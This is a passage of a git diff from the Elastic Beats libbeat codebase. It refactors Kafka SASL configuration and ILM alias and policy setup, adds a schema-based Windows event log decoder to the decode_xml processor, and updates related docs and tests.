strings.ToUpper(c.SaslMechanism) { // try not to force users to use all upper case + case "": + // SASL is not enabled + return + case saslTypePlaintext: + config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypePlaintext) + case saslTypeSCRAMSHA256: + config.Net.SASL.Handshake = true + config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA256) + config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { + return &XDGSCRAMClient{HashGeneratorFcn: SHA256} + } + case saslTypeSCRAMSHA512: + config.Net.SASL.Handshake = true + config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA512) + config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { + return &XDGSCRAMClient{HashGeneratorFcn: SHA512} + } + default: + // This should never happen because `SaslMechanism` is checked on `Validate()`, keeping a panic to detect it earlier if it happens. + panic(fmt.Sprintf("not valid SASL mechanism '%v', only supported with PLAIN|SCRAM-SHA-512|SCRAM-SHA-256", c.SaslMechanism)) + } +} + +func (c *SaslConfig) Validate() error { + switch strings.ToUpper(c.SaslMechanism) { // try not to force users to use all upper case + case "", saslTypePlaintext, saslTypeSCRAMSHA256, saslTypeSCRAMSHA512: + default: + return fmt.Errorf("not valid SASL mechanism '%v', only supported with PLAIN|SCRAM-SHA-512|SCRAM-SHA-256", c.SaslMechanism) + } + return nil +} diff --git a/libbeat/outputs/kafka/scram.go b/libbeat/common/kafka/scram.go similarity index 100% rename from libbeat/outputs/kafka/scram.go rename to libbeat/common/kafka/scram.go diff --git a/libbeat/docs/processors-list.asciidoc b/libbeat/docs/processors-list.asciidoc index e2670ebc39e..3900366708f 100644 --- a/libbeat/docs/processors-list.asciidoc +++ b/libbeat/docs/processors-list.asciidoc @@ -29,6 +29,9 @@ endif::[] ifndef::no_add_locale_processor[] * <> endif::[] +ifndef::no_add_nomad_metadata_processor[] +* <> +endif::[] ifndef::no_add_observer_metadata_processor[] * <> endif::[] @@ -59,6 +62,9 @@ endif::[] ifndef::no_decode_json_fields_processor[] * <> endif::[] +ifndef::no_decode_xml_processor[] +* <> +endif::[] ifndef::no_decompress_gzip_field_processor[] * <> endif::[] @@ -110,9 +116,6 @@ endif::[] ifndef::no_urldecode_processor[] * <> endif::[] -ifndef::no_decode_xml_processor[] -* <> -endif::[] //# end::processors-list[] //# tag::processors-include[] @@ -147,6 +150,9 @@ endif::[] ifndef::no_add_network_direction_processor[] include::{libbeat-processors-dir}/actions/docs/add_network_direction.asciidoc[] endif::[] +ifndef::no_add_nomad_metadata_processor[] +include::{x-libbeat-processors-dir}/add_nomad_metadata/docs/add_nomad_metadata.asciidoc[] +endif::[] ifndef::no_add_observer_metadata_processor[] include::{libbeat-processors-dir}/add_observer_metadata/docs/add_observer_metadata.asciidoc[] endif::[] diff --git a/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc new file mode 100644 index 00000000000..a5ef7e4929e --- /dev/null +++ b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc @@ -0,0 +1,18 @@ +[[breaking-changes-7.12]] + +=== Breaking changes in 7.12 +++++ +7.12 +++++ + +//NOTE: The notable-breaking-changes tagged regions are re-used in the +//Installation and Upgrade Guide + +// tag::notable-breaking-changes[] + +No breaking changes. + +// end::notable-breaking-changes[] + +See the <> for a complete list of changes, +including changes to beta or experimental functionality. diff --git a/libbeat/docs/release-notes/breaking/breaking.asciidoc b/libbeat/docs/release-notes/breaking/breaking.asciidoc index 916b4670802..8f10c73a782 100644 --- a/libbeat/docs/release-notes/breaking/breaking.asciidoc +++ b/libbeat/docs/release-notes/breaking/breaking.asciidoc @@ -11,6 +11,8 @@ changes, but there are breaking changes between major versions (e.g. 6.x to See the following topics for a description of breaking changes: +* <> + * <> * <> @@ -35,6 +37,9 @@ See the following topics for a description of breaking changes: * <> + +include::breaking-7.12.asciidoc[] + include::breaking-7.11.asciidoc[] include::breaking-7.10.asciidoc[] diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index 7c6f3aa2a16..a53bf859bc3 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> diff --git a/libbeat/docs/shared-autodiscover.asciidoc b/libbeat/docs/shared-autodiscover.asciidoc index 90ff07ea762..7bfed6f8f74 100644 --- a/libbeat/docs/shared-autodiscover.asciidoc +++ b/libbeat/docs/shared-autodiscover.asciidoc @@ -117,7 +117,13 @@ It has the following settings: `ssl`:: (Optional) SSL configuration to use when connecting to the Docker socket. `cleanup_timeout`:: (Optional) Specify the time of inactivity before stopping the -running configuration for a container, 60s by default. +running configuration for a container, +ifeval::["{beatname_lc}"=="filebeat"] + 60s by default. +endif::[] +ifeval::["{beatname_lc}"!="filebeat"] + disabled by default. +endif::[] `labels.dedot`:: (Optional) Default to be false. If set to true, replace dots in labels with `_`. @@ -218,7 +224,13 @@ The `kubernetes` autodiscover provider has the following configuration settings: namespaces. It is unset by default. The namespace configuration only applies to kubernetes resources that are namespace scoped. `cleanup_timeout`:: (Optional) Specify the time of inactivity before stopping the -running configuration for a container, 60s by default. +running configuration for a container, +ifeval::["{beatname_lc}"=="filebeat"] + 60s by default. +endif::[] +ifeval::["{beatname_lc}"!="filebeat"] + disabled by default. +endif::[] `kube_config`:: (Optional) Use given config file as configuration for Kubernetes client. If kube_config is not set, KUBECONFIG environment variable will be checked and if not present it will fall back to InCluster. @@ -493,7 +505,7 @@ ifdef::autodiscoverAWSEC2[] [float] ===== Amazon EC2s -*Note: This provider is experimental* +experimental[] The Amazon EC2 autodiscover provider discovers https://aws.amazon.com/ec2/[EC2 instances]. This is useful for users to launch {beatname_uc} modules to monitor services running on AWS EC2 instances. diff --git a/libbeat/docs/shared-libbeat-description.asciidoc b/libbeat/docs/shared-libbeat-description.asciidoc index a2c78691fbb..c457c21be0f 100644 --- a/libbeat/docs/shared-libbeat-description.asciidoc +++ b/libbeat/docs/shared-libbeat-description.asciidoc @@ -1,3 +1,3 @@ -{beatname_uc} is an Elastic https://www.elastic.co/products/beats[Beat]. It's +{beatname_uc} is an Elastic https://www.elastic.co/beats[Beat]. It's based on the `libbeat` framework. For more information, see the {beats-ref}/index.html[{libbeat-docs}]. diff --git a/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc b/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc index b0df100624e..43b89362708 100644 --- a/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc +++ b/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc @@ -28,7 +28,7 @@ aria-labelledby="deb-setup"> ++++ -include::setup.asciidoc[tag=mac] +include::setup.asciidoc[tag=deb] ++++ @@ -39,7 +39,7 @@ include::setup.asciidoc[tag=mac] hidden=""> ++++ -include::setup.asciidoc[tag=linux] +include::setup.asciidoc[tag=rpm] ++++ @@ -50,7 +50,7 @@ include::setup.asciidoc[tag=linux] hidden=""> ++++ -include::setup.asciidoc[tag=win] +include::setup.asciidoc[tag=linux] ++++ diff --git a/libbeat/docs/version.asciidoc b/libbeat/docs/version.asciidoc index b9212db4e41..7c826606e6d 100644 --- a/libbeat/docs/version.asciidoc +++ b/libbeat/docs/version.asciidoc @@ -1,6 +1,6 @@ :stack-version: 8.0.0 :doc-branch: master -:go-version: 1.15.9 +:go-version: 1.15.10 :release-state: unreleased :python: 3.7 :docker: 1.12 diff --git a/libbeat/esleg/eslegclient/bulkapi.go b/libbeat/esleg/eslegclient/bulkapi.go index 8a8e391a7eb..1b9162eba39 100644 --- a/libbeat/esleg/eslegclient/bulkapi.go +++ b/libbeat/esleg/eslegclient/bulkapi.go @@ -168,7 +168,7 @@ func (conn *Connection) sendBulkRequest(requ *bulkRequest) (int, BulkResult, err func bulkEncode(log *logp.Logger, out BulkWriter, body []interface{}) error { for _, obj := range body { if err := out.AddRaw(obj); err != nil { - log.Debugf("Failed to encode message: %s", err) + log.Debugf("Failed to encode message: %v %s", obj, err) return err } } diff --git a/libbeat/idxmgmt/ilm/ilm_test.go b/libbeat/idxmgmt/ilm/ilm_test.go index e47a9c0d06b..8ca9b9e6c43 100644 --- a/libbeat/idxmgmt/ilm/ilm_test.go +++ b/libbeat/idxmgmt/ilm/ilm_test.go @@ -238,6 +238,27 @@ func TestDefaultSupport_Manager_EnsureAlias(t *testing.T) { }, fail: ErrRequestFailed, }, + "overwrite non-existent": { + calls: []onCall{ + onCreateAlias(alias).Return(nil), + }, + fail: nil, + cfg: map[string]interface{}{"check_exists": false, "overwrite": true}, + }, + "try overwrite existing": { + calls: []onCall{ + onCreateAlias(alias).Return(errOf(ErrAliasAlreadyExists)), + }, + fail: nil, // we detect that that the alias exists, and call it a day. + cfg: map[string]interface{}{"check_exists": false, "overwrite": true}, + }, + "fail to overwrite": { + calls: []onCall{ + onCreateAlias(alias).Return(errOf(ErrAliasCreateFailed)), + }, + fail: ErrAliasCreateFailed, + cfg: map[string]interface{}{"check_exists": false, "overwrite": true}, + }, } for name, test := range cases { @@ -283,12 +304,14 @@ func TestDefaultSupport_Manager_EnsurePolicy(t *testing.T) { }, }, "policy already exists": { + create: false, calls: []onCall{ onHasILMPolicy(testPolicy.Name).Return(true, nil), }, }, - "overwrite existing": { + "overwrite": { overwrite: true, + create: true, calls: []onCall{ onCreateILMPolicy(testPolicy).Return(nil), }, diff --git a/libbeat/idxmgmt/ilm/std.go b/libbeat/idxmgmt/ilm/std.go index 0e33fc00f3e..1f6a0151afc 100644 --- a/libbeat/idxmgmt/ilm/std.go +++ b/libbeat/idxmgmt/ilm/std.go @@ -103,42 +103,77 @@ func (m *stdManager) CheckEnabled() (bool, error) { } func (m *stdManager) EnsureAlias() error { - if !m.checkExists { - return nil - } + log := m.log + overwrite := m.Overwrite() + name := m.alias.Name - b, err := m.client.HasAlias(m.alias.Name) - if err != nil { - return err + var exists bool + if m.checkExists && !overwrite { + var err error + exists, err = m.client.HasAlias(name) + if err != nil { + return err + } } - if b { + + switch { + case exists && !overwrite: + log.Infof("Index Alias %v exists already.", name) return nil - } - // This always assume it's a date pattern by sourrounding it by <...> - return m.client.CreateAlias(m.alias) + case !exists || overwrite: + err := m.client.CreateAlias(m.alias) + if err != nil { + if ErrReason(err) != ErrAliasAlreadyExists { + log.Errorf("Index Alias %v setup failed: %v.", name, err) + return err + } + log.Infof("Index Alias %v exists already.", name) + return nil + } + + log.Infof("Index Alias %v successfully created.", name) + return nil + + default: + m.log.Infof("ILM index alias not created: exists=%v, overwrite=%v", exists, overwrite) + return nil + } } func (m *stdManager) EnsurePolicy(overwrite bool) (bool, error) { log := m.log overwrite = overwrite || m.Overwrite() + name := m.policy.Name - exists := true + var exists bool if m.checkExists && !overwrite { - b, err := m.client.HasILMPolicy(m.policy.Name) + var err error + exists, err = m.client.HasILMPolicy(name) if err != nil { return false, err } - exists = b } - if !exists || overwrite { - return !exists, m.client.CreateILMPolicy(m.policy) - } + switch { + case exists && !overwrite: + log.Infof("ILM policy %v exists already.", name) + return false, nil + + case !exists || overwrite: + err := m.client.CreateILMPolicy(m.policy) + if err != nil { + log.Errorf("ILM policy %v creation failed: %v", name, err) + return false, err + } - log.Infof("do not generate ilm policy: exists=%v, overwrite=%v", - exists, overwrite) - return false, nil + log.Infof("ILM policy %v successfully created.", name) + return true, err + + default: + log.Infof("ILM policy not created: exists=%v, overwrite=%v.", exists, overwrite) + return false, nil + } } func (c *infoCache) Valid() bool { diff --git a/libbeat/idxmgmt/std.go b/libbeat/idxmgmt/std.go index 538fc7d2262..99cf5890353 100644 --- a/libbeat/idxmgmt/std.go +++ b/libbeat/idxmgmt/std.go @@ -271,7 +271,6 @@ func (m *indexManager) Setup(loadTemplate, loadILM LoadMode) error { if err != nil { return err } - log.Info("ILM policy successfully loaded.") // The template should be updated if a new policy is created. if policyCreated && templateComponent.enabled { @@ -299,14 +298,9 @@ func (m *indexManager) Setup(loadTemplate, loadILM LoadMode) error { } if ilmComponent.load { - // ensure alias is created after the template is created - if err := m.ilm.EnsureAlias(); err != nil { - if ilm.ErrReason(err) != ilm.ErrAliasAlreadyExists { - return err - } - log.Info("Write alias exists already") - } else { - log.Info("Write alias successfully generated.") + err := m.ilm.EnsureAlias() + if err != nil { + return err } } diff --git a/libbeat/kibana/client.go b/libbeat/kibana/client.go index 3b951ee5e34..a8509d26636 100644 --- a/libbeat/kibana/client.go +++ b/libbeat/kibana/client.go @@ -118,7 +118,7 @@ func NewClientWithConfig(config *ClientConfig) (*Client, error) { } log := logp.NewLogger("kibana") - log.Info("Kibana url: %s", kibanaURL) + log.Infof("Kibana url: %s", kibanaURL) var dialer, tlsDialer transport.Dialer diff --git a/libbeat/management/management.go b/libbeat/management/management.go index 509d2978eae..b29dd74a3c9 100644 --- a/libbeat/management/management.go +++ b/libbeat/management/management.go @@ -26,6 +26,7 @@ import ( "github.com/elastic/beats/v7/libbeat/common/reload" "github.com/elastic/beats/v7/libbeat/feature" "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/elastic-agent-client/v7/pkg/client" ) // Status describes the current status of the beat. @@ -82,6 +83,14 @@ type Manager interface { // CheckRawConfig check settings are correct before launching the beat. CheckRawConfig(cfg *common.Config) error + + // RegisterAction registers action handler with the client + RegisterAction(action client.Action) + // UnregisterAction unregisters action handler with the client + UnregisterAction(action client.Action) + + // SetPayload sets the client payload + SetPayload(map[string]interface{}) } // PluginFunc for creating FactoryFunc if it matches a config @@ -155,3 +164,9 @@ func (n *nilManager) UpdateStatus(status Status, msg string) { n.logger.Infof("Status change to %s: %s", status, msg) } } + +func (n *nilManager) RegisterAction(action client.Action) {} + +func (n *nilManager) UnregisterAction(action client.Action) {} + +func (n *nilManager) SetPayload(map[string]interface{}) {} diff --git a/libbeat/outputs/kafka/config.go b/libbeat/outputs/kafka/config.go index 3747a2fa63c..374ed500e10 100644 --- a/libbeat/outputs/kafka/config.go +++ b/libbeat/outputs/kafka/config.go @@ -68,14 +68,10 @@ type kafkaConfig struct { Username string `config:"username"` Password string `config:"password"` Codec codec.Config `config:"codec"` - Sasl saslConfig `config:"sasl"` + Sasl kafka.SaslConfig `config:"sasl"` EnableFAST bool `config:"enable_krb5_fast"` } -type saslConfig struct { - SaslMechanism string `config:"mechanism"` -} - type metaConfig struct { Retry metaRetryConfig `config:"retry"` RefreshFreq time.Duration `config:"refresh_frequency" validate:"min=0"` @@ -140,36 +136,6 @@ func defaultConfig() kafkaConfig { } } -func (c *saslConfig) configureSarama(config *sarama.Config) error { - switch strings.ToUpper(c.SaslMechanism) { // try not to force users to use all upper case - case "": - // SASL is not enabled - return nil - case saslTypePlaintext: - config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypePlaintext) - case saslTypeSCRAMSHA256: - cfgwarn.Beta("SCRAM-SHA-256 authentication for Kafka is beta.") - - config.Net.SASL.Handshake = true - config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA256) - config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { - return &XDGSCRAMClient{HashGeneratorFcn: SHA256} - } - case saslTypeSCRAMSHA512: - cfgwarn.Beta("SCRAM-SHA-512 authentication for Kafka is beta.") - - config.Net.SASL.Handshake = true - config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA512) - config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { - return &XDGSCRAMClient{HashGeneratorFcn: SHA512} - } - default: - return fmt.Errorf("not valid mechanism '%v', only supported with PLAIN|SCRAM-SHA-512|SCRAM-SHA-256", c.SaslMechanism) - } - - return nil -} - func readConfig(cfg *common.Config) (*kafkaConfig, error) { c := defaultConfig() if err := cfg.Unpack(&c); err != nil { @@ -252,11 +218,7 @@ func newSaramaConfig(log *logp.Logger, config *kafkaConfig) (*sarama.Config, err k.Net.SASL.Enable = true k.Net.SASL.User = config.Username k.Net.SASL.Password = config.Password - err = config.Sasl.configureSarama(k) - - if err != nil { - return nil, err - } + config.Sasl.ConfigureSarama(k) } // configure metadata update properties diff --git a/libbeat/processors/decode_xml/config.go b/libbeat/processors/decode_xml/config.go index 289b2eaa0e9..21bb426c5b2 100644 --- a/libbeat/processors/decode_xml/config.go +++ b/libbeat/processors/decode_xml/config.go @@ -25,6 +25,7 @@ type decodeXMLConfig struct { ToLower bool `config:"to_lower"` IgnoreMissing bool `config:"ignore_missing"` IgnoreFailure bool `config:"ignore_failure"` + Schema string `config:"schema"` } func defaultConfig() decodeXMLConfig { diff --git a/libbeat/processors/decode_xml/decode_xml.go b/libbeat/processors/decode_xml/decode_xml.go index 0b229cff3d2..5d841a2b576 100644 --- a/libbeat/processors/decode_xml/decode_xml.go +++ b/libbeat/processors/decode_xml/decode_xml.go @@ -21,12 +21,10 @@ import ( "encoding/json" "errors" "fmt" - "strings" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/common/cfgwarn" - "github.com/elastic/beats/v7/libbeat/common/encoding/xml" "github.com/elastic/beats/v7/libbeat/common/jsontransform" "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/processors" @@ -36,7 +34,9 @@ import ( type decodeXML struct { decodeXMLConfig - log *logp.Logger + + decode decoder + log *logp.Logger } var ( @@ -51,9 +51,15 @@ const ( func init() { processors.RegisterPlugin(procName, checks.ConfigChecked(New, - checks.RequireFields("fields"), - checks.AllowedFields("fields", "overwrite_keys", "add_error_key", "target", "document_id"))) + checks.RequireFields("field"), + checks.AllowedFields( + "field", "target_field", + "overwrite_keys", "document_id", + "to_lower", "ignore_missing", + "ignore_failure", "schema", + ))) jsprocessor.RegisterPlugin(procName, New) + registerDecoders() } // New constructs a new decode_xml processor. @@ -77,6 +83,7 @@ func newDecodeXML(config decodeXMLConfig) (processors.Processor, error) { return &decodeXML{ decodeXMLConfig: config, + decode: newDecoder(config), log: logp.NewLogger(logName), }, nil } @@ -104,9 +111,9 @@ func (x *decodeXML) run(event *beat.Event) error { return errFieldIsNotString } - xmlOutput, err := x.decodeField(text) + xmlOutput, err := x.decode([]byte(text)) if err != nil { - return err + return fmt.Errorf("error decoding XML field: %w", err) } var id string @@ -131,19 +138,6 @@ func (x *decodeXML) run(event *beat.Event) error { return nil } -func (x *decodeXML) decodeField(data string) (decodedData map[string]interface{}, err error) { - dec := xml.NewDecoder(strings.NewReader(data)) - if x.ToLower { - dec.LowercaseKeys() - } - - out, err := dec.Decode() - if err != nil { - return nil, fmt.Errorf("error decoding XML field: %w", err) - } - return out, nil -} - func (x *decodeXML) String() string { json, _ := json.Marshal(x.decodeXMLConfig) return procName + "=" + string(json) diff --git a/libbeat/processors/decode_xml/decode_xml_test.go b/libbeat/processors/decode_xml/decode_xml_test.go index 26d075bf3a4..04c3c8847ed 100644 --- a/libbeat/processors/decode_xml/decode_xml_test.go +++ b/libbeat/processors/decode_xml/decode_xml_test.go @@ -57,7 +57,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "xml": map[string]interface{}{ + "xml": common.MapStr{ "catalog": map[string]interface{}{ "book": map[string]interface{}{ "author": "William H. Gaddis", @@ -125,7 +125,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": map[string]interface{}{ "author": "William H. Gaddis", @@ -158,7 +158,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": []interface{}{ map[string]interface{}{ @@ -203,7 +203,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": []interface{}{ map[string]interface{}{ @@ -448,7 +448,7 @@ func TestXMLToDocumentID(t *testing.T) { require.NoError(t, err) wantFields := common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": map[string]interface{}{ "author": "William H. Gaddis", diff --git a/libbeat/processors/decode_xml/docs/decode_xml.asciidoc b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc index ded0543514a..c21c25081fc 100644 --- a/libbeat/processors/decode_xml/docs/decode_xml.asciidoc +++ b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc @@ -26,7 +26,7 @@ processors: By default any decoding errors that occur will stop the processing chain and the error will be added to `error.message` field. To ignore all errors and continue to the next processor you can set `ignore_failure: true`. To specifically -ignore failures caused by `field` not existing use `ignore_missing`. +ignore failures caused by `field` not existing you can set `ignore_missing: true`. [source,yaml] ------- @@ -55,15 +55,13 @@ Example XML input: [source,xml] ------------------------------------------------------------------------------- -{ - - - William H. Gaddis - The Recognitions - One of the great seminal American novels of the 20th century. - - -} + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + ------------------------------------------------------------------------------- Will produce the following output: @@ -97,10 +95,13 @@ value (`target_field:`) is treated as if the field was not set at all. `overwrite_keys`:: (Optional) A boolean that specifies whether keys that already exist in the event are overwritten by keys from the decoded XML object. The -default value is false. +default value is `true`. `to_lower`:: (Optional) Converts all keys to lowercase. Accepts either true or -false. The default value is true. +false. The default value is `true`. + +`schema`:: (Optional) Specifies the schema of the message. Accepted schemas: `wineventlog`. +If no schema is specified it defaults to using the regular XML to JSON conversion. `document_id`:: (Optional) XML key to use as the document ID. If configured, the field will be removed from the original XML document and stored in @@ -113,3 +114,80 @@ when a specified field does not exist. Defaults to `false`. Defaults to `false`. See <> for a list of supported conditions. + + +==== Schemas + +When a schema is defined, the specific decoder will parse the configured field. +The ouput of the parsing will be specific to that schema. + +===== Wineventlog + +The `wineventlog` schema decodes Windows Events. + +The decoder will always output the fields formatted in the same way, the +`to_lower` option will be ignored when using this schema decoder. +The output fields will be the same as the +{winlogbeat-ref}/exported-fields-winlog.html#_winlog[winlogbeat winlog fields]. + +Example: + +[source,yaml] +------------------------------------------------------------------------------- +processors: + - decode_xml: + field: event.original + target_field: winlog + to_lower: false +------------------------------------------------------------------------------- + +[source,json] +------------------------------------------------------------------------------- +{ + "event": { + "original": "4672001254800x802000000000000011303SecurityvagrantS-1-5-18SYSTEMNT AUTHORITY0x3e7SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeSpecial privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformationSpecial LogonInfoSecurityMicrosoft Windows security auditing.Audit Success" + } +} +------------------------------------------------------------------------------- + +Will produce the following output: + +[source,json] +------------------------------------------------------------------------------- +{ + "event": { + "original": "4672001254800x802000000000000011303SecurityvagrantS-1-5-18SYSTEMNT AUTHORITY0x3e7SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeSpecial privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformationSpecial LogonInfoSecurityMicrosoft Windows security auditing.Audit Success" + }, + "winlog": { + "channel": "Security", + "outcome": "success", + "activity_id": "{ffb23523-1f32-0000-c335-b2ff321fd701}", + "level": "information", + "event_id": 4672, + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 11303, + "computer_name": "vagrant", + "keywords_raw": 9232379236109516800, + "opcode": "Info", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "event_data": { + "SubjectUserSid": "S-1-5-18", + "SubjectUserName": "SYSTEM", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e7", + "PrivilegeList": "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege" + }, + "task": "Special Logon", + "keywords": [ + "Audit Success" + ], + "message": "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "process": { + "pid": 652, + "thread": { + "id": 4660 + } + } + } +} +------------------------------------------------------------------------------- diff --git a/libbeat/processors/decode_xml/schema.go b/libbeat/processors/decode_xml/schema.go new file mode 100644 index 00000000000..10043ec3d0b --- /dev/null +++ b/libbeat/processors/decode_xml/schema.go @@ -0,0 +1,95 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "bytes" + "errors" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" +) + +const wineventlogSchema = "wineventlog" + +type newDecoderFunc func(cfg decodeXMLConfig) decoder +type decoder func(p []byte) (common.MapStr, error) + +var ( + registeredDecoders = map[string]newDecoderFunc{} + newDefaultDecoder newDecoderFunc = newSchemaLessDecoder +) + +func registerDecoder(schema string, dec newDecoderFunc) error { + if schema == "" { + return errors.New("schema can't be empty") + } + + if dec == nil { + return errors.New("decoder can't be nil") + } + + if _, found := registeredDecoders[schema]; found { + return errors.New("already registered") + } + + registeredDecoders[schema] = dec + + return nil +} + +func newDecoder(cfg decodeXMLConfig) decoder { + newDec, found := registeredDecoders[cfg.Schema] + if !found { + return newDefaultDecoder(cfg) + } + return newDec(cfg) +} + +func registerDecoders() { + log := logp.L().Named(logName) + log.Debug(registerDecoder(wineventlogSchema, newWineventlogDecoder)) +} + +func newSchemaLessDecoder(cfg decodeXMLConfig) decoder { + return func(p []byte) (common.MapStr, error) { + dec := xml.NewDecoder(bytes.NewReader(p)) + if cfg.ToLower { + dec.LowercaseKeys() + } + + out, err := dec.Decode() + if err != nil { + return nil, err + } + + return common.MapStr(out), nil + } +} + +func newWineventlogDecoder(decodeXMLConfig) decoder { + return func(p []byte) 